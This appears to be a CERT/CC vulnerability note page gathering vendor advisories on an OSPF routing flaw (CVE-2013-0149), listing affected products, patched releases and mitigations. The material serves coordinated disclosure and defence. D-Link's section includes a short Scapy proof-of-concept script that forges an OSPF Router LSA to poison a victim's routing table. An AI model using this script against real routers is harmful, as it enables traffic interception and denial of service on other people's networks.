Software Engineering Institute

Notified:  June 13, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN

July 25, 2013

TSB 2013-165- A SEVERITY: Low – Informational

PRODUCTS AFFECTE D:
Brocade MLX Series running NetIron SW
Brocade NetIron XMR Series running NetIron SW
Brocade NetIron CER Series running NetIron SW
Brocade NetIron CES Series running NetIron SW
Brocade VDX Series running Network OS 3.x and later SW
Brocade FastIron Series running FastIron SW
Brocade ICX Series running FastIron SW
Brocade TurboIron Series running FastIron or TurboIron SW
Brocade BigIron RX Series running BigIron RX SW
Brocade ADX Series and JetCore Series running ServerIron SW
Brocade Vyatta vRouter
CORRECTED IN RELEASE:
See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as
CVE-2013-0149. See http://nvd.nist.gov/home.cfm for details.

Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that
have a direct, entitled, support relationship in place with Brocade

Please contact your primary service provider for further information regarding this topic and
applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already
has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing
tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc.
The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1); where the link state
ID & router ID in the LSA is not same; leading to corruption of routing table in the routers.
The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a
legitimate OSPF peer. OR the router LSA is sent in the interface where an OSPF peer is existing
already.

WORKAROUND
There is no workaround. However if users can physically secure their network/routers, the chance of
this attack is quite low.
The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections, (i.e. leaf
interfaces).
c) Enable OSPF MD5 authentication
This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See http://My.Brocade.com for the appropriate SW release(s) as listed below, please contact your
account team or Brocade Support if you have further questions.

Affected Products:
 Brocade MLX Series
 Brocade NetIron XMR Series
 Brocade NetIron CER Series
 Brocade NetIron CES Series

SW Releases with problem resolved
 NetIron 05.2.00k and later
 NetIron 05.3.00f and later
 NetIron 05.4.00e and later
 NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
 Brocade VDX Series

SW Releases with problem resolved
 Network OS 3.0.1c and later
 Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
 Brocade FastIron Series
 Brocade ICX Series
 Brocade TurboIron Series

SW Releases with problem resolved
 FastIron 7.2.02k and later
 FastIron 7.3.00g and later
 FastIron 07.4.00d and later
 FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
 Brocade BigIron RX Series

SW Releases with problem resolved
 BigIron RX 2.7.02p and later
 BigIron RX 02.8.00f and later
 BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
 Brocade ADX Series and JetCore Series

SW Releases with problem resolved
 ServerIron JetCore 10.2.02d
 ServerIron JetCore 11.0.00k
 ServerIron ADX 12.3.01k
 ServerIron ADX 12.4.00k
 ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
 Brocade Vyatta vRouter

For customers running on Amazon Web
Services this problem has been resolved.
SW Releases with problem resolved
 Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Notified:  May 22, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

Cisco has provided patches for this vulnerability, please check the URL below for details.

Vendor References

• http://tools.cisco.com/security/center/viewAlert.x?alertId=30210

Notified:  May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

1.Advisory Information

Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
D-Link ID: DLINK-2013-VUL0213
Advisory URL: TBD prior to Aug. 1, 2013
Date published: August 1, 2013
Date of last update: 7/29/13 (will update on saving document)
Reported by: CERT
Release mode: Coordinated Release

2.Vulnerability Information
Class: CWE-694
Impact: Critical
Remotely Exploitable: Possible, but would require access via other product (s)
Locally Exploitable: Yes
CVE Name: CVE-2013-0149
3.Vulnerability Description
The Open Shortest Path First (OSPF) protocol does not specify unique Link State
Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or
conduct a Denial of Service (DoS) attack.

This vulnerability can allow an attacker to re-route traffic through their own router,
compromising the confidentiality of the data, or to conduct a Denial of Service attack
against a router, dropping all traffic.

4.Vulnerable Packages
The following is the list of known affected devices and the associated firmware
(confirmed by D-Link). This will be updated as needed if additional units effected.
1. DES-3810-28 – R2.20.B017 (HW Not available in the US)

5.VendorInformation, Solutions and Workarounds
D-Link distributes a number of devices which could potentially be affected by this
vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of
being subject to this attack.

D-Link is working to reduce the potential impact of this vulnerability, which is a result of
an ambiguous standard. Currently we advise the following:

As always, adhering to best practices will be the strongest defense against attacks. As
long as your physical devices, networks, and protocols are secured, it will be very
difficult for an attacker to insert a rogue LSA to initiate this type of attack.

First, this vulnerability does not defeat cryptographic (MD5) authentication, we
recommend a strong MD5 authentication key as your best defense.
We also recommend that administrators enable the OSPF passive interface feature to
stop sending or receiving routing table updates on interfaces that do not participate in
OSPF.

Finally, we recommend that networks use MAC-based Access Control (MAC) to
authenticate devices before they are able to communicate with the network. The MAC
feature is a client-less design so there is no need to install extra software on a user’s
computer, and ensures that only devices on a whitelist will have access to the network.
When used in conjunction with common security best practices, it can help to strongly
limit the possible vectors of attack.

D-Link is monitoring the situation for an update to the standard that can be implemented
to protect potentially affected devices.

6.Credits
Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
The publication of this advisory was not coordinated with forementioned

7.Technical Description / Proof of Concept Code

7.1.OSPF 𠇏ight Back” is triggered by LSAs with matching Router ID only, and so can
be evaded by using non matching Router ID and Link State ID on a rogue LSA. Routing
lookup uses only the Link State ID field, and so may, depending on implementation,
result in selecting the rogue LSA before the valid LSA.

scappy proof of concept attack script

attacker_source_ip = "192.168.13.1"
attacker_router_id = "192.168.18.1"
victim_destination_ip = "192.168.13.3"
victim_router_id = "192.168.37.3"
false_adv_router = "192.168.27.11"
seq_num = 0x80000004L
R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
/OSPF_Hdr(src=attacker_router_id) \
/OSPF_LSUpd(lsalist=[ \
OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router,
seq=seq_num, linklist=[ \
OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1), \
OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1), \
OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3) \
])
])
send(R3_FALSE_LSA, iface="eth0")

8.ReportTimeline
• May 28, 2013 – Notification by Cert of the issue
• May 28, 2013 – Notify Qualified D-Link Resources of issue
• June 6, 2013 – Cert notified embargo date changed to July 30
• Jun 6, 2013 – D-Link Request Cert to resend details
• June 11, 2013 – D-Link receives details
• July 29, 2013 – Cert notified embargo date changed to Aug 1
• July 29, 2013 – D-Link Sends Vulnerability Response Report to Cert
• July 30, 2013 – D-Link Post Report for effected Products

9.References
[1] CVE-229804-2013.pdf – Owning the Routing Table Part II

10.AboutD-Link
D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise
environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link
implements and supports unified network solutions that integrate capabilities in switching, wireless,
broadband, storage, IP Surveillance, and cloud-based network management. For more information visit
www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter
(www.twitter.com/dlink).

11.Disclaimer
D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its
subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners.
Copyright © 2013. D-Link. All Rights Reserved.

References

Authors:
Patrick Cline - Patrick.Cline@dlink.com
William Brown – William.Brown@dlink.com

Vendor Information

Please see DLINK-2013-VUL0213.

Notified:  May 28, 2013 Updated: August 19, 2013

Status

Affected

Vendor Statement

Product Advisory Note - https://cp-enterasys.kb.net/article.aspx?article=15134&p=1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

• https://cp-enterasys.kb.net/article.aspx?article=15134&p=1

Notified:  May 28, 2013 Updated: July 30, 2013

Status

Affected

Vendor Statement

Extreme networks' EXOS implementation of OSPF is susceptible to the vulnerability reported in VU#229804.

This vulnerability will be fixed in future EXOS release.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Notified:  May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

IBM has provided updates for multiple products, please check the URLs below for details.

Vendor References

• http://www-912.ibm.com/systems/electronic/support/s_dir/slkbase.nsf/docNumber/677961906
• http://www-01.ibm.com/support/docview.wss?uid=isg3T1019716

Notified:  May 10, 2013 Updated: December 03, 2013

Status

Affected

Vendor Statement

LEGACY ADVISORY ID:

PSN-2013-08-987

PRODUCT AFFECTED:
All Juniper Networks platforms running Junos Operating System software, JunosE Operating System software, and ScreenOS software

PROBLEM:
A vulnerability has been discovered in the OSPF (Open Shortest Path First) protocol that allows a remote attacker to insert, update, or delete routes in the OSPF database. Juniper has worked to provide fixes for all supported code that is vulnerable to this issue.

The issue lies in the OSPF protocol (RFC 2328: http://www.rfc-editor.org/rfc/rfc2328.txt). OSPF does not specify that the 'Link State ID' and 'Advertising Router' fields need to match when a router receives an OSPF link-state advertisement (LSA). This limitation of the protocol specification would allow for an attacker to inject false routes into the OSPF database. This issue doesn't exist if the OSPF configuration of a router is set to use MD5 Authentication, or if a filter is used to block external parties from sending OSPF link-state update (LSU) packets. This issue also does not apply to passive OSPF interfaces or interfaces that are not configured for OSPF.

This issue was discovered by an external security researcher.

No other Juniper Networks products or platforms are affected by this issue.

This issue has been assigned CVE-2013-0149.

SOLUTION:
Releases containing (or will contain) the fix specifically include: 13.1R3, 13.2X50-D10, 12.3R3, 12.2R5, 12.1R7, 12.1X45-D10, 12.1X44-D15, 11.4R8, 10.4R15, and all subsequent releases. In addition, all Junos OS software releases built on or after 2013-07-25 will also have fixed this specific issue.

Customers can confirm the build date of any Junos OS release by issuing the command 'show version detail'.

All JunosE software releases built on or after 2013-07-25 have fixed this specific issue. Please contact JTAC to request a patch or hotfix for fixes on all other supported releases of code.

Software updates to ScreenOS have been released to resolve this issue. Releases containing the fix include ScreenOS 5.4.0r28a, 6.2.0r17a, and 6.3.0r14a.

This issue is being tracked as PR 878639 (Junos), CQ95773 (JunosE), and PR 895456 (ScreenOS).

KB16765 - "In which releases are vulnerabilities fixed?" describes which release vulnerabilities are fixed as per our End of Engineering and End of Life support policies.

WORKAROUND:
Juniper recommends that customers use MD5 authentication when configuring OSPF. MD5 authentication completely mitigates this issue as the router will not accept an LSA without the correct MD5 auth value.

It is good security practice to limit the exploitable attack surface of critical infrastructure networking equipment. Use access lists or firewall filters on physical interfaces (not loopback) to limit access to the router via OSPF unless necessary.

Customers can request a hotfix for this issue on JunosE may do so by contacting JTAC.
IMPLEMENTATION:

RELATED LINKS:
KB16613: Overview of the Juniper Networks SIRT Monthly Security Bulletin Publication Process
KB16765: In which releases are vulnerabilities fixed?
KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories.
Report a Vulnerability - How to Contact the Juniper Networks Security Incident Response Team
CVE-2013-0149

CVSS SCORE:
7.8 (AV:N/AC:M/Au:N/C:N/I:P/A:C)

RISK LEVEL:
High

RISK ASSESSMENT:
This issue could allow an remote attacker the ability to modify an OSPF database. For the issue to take place the attacker would need to have unfiltered access to an OSPF interface that is not using MD5 authentication. The attacker would be able to add routes, overwrite routes, and also clear the OSPF database. This attack could potentially allow an attacker to cause a denial of service or reroute traffic.

ACKNOWLEDGEMENTS:
Juniper SIRT would like to acknowledge and thank Gabi Nakibly for responsibly reporting this vulnerability to CERT/CC who coordinated the multi-vendor response.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

• http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10582&cat=SIRT_1&actp= LIST

Notified:  May 28, 2013 Updated: September 10, 2013

Status

Affected

Vendor Statement

We provide information on this issue at the following URL: http://jpn.nec.com/security-info/secinfo/nv13-006.html (only in Japanese)

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

• http://jpn.nec.com/security-info/secinfo/nv13-006.html

Notified:  May 28, 2013 Updated: October 16, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

Affected products include: Oracle Sun Blade 6000 10GBE switched NEM 1.2, Sun Network 10GBE Switch 72P 1.2, Oracle Switch ES1-24 1.3. A patch is available at the following link.

Vendor References

• http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html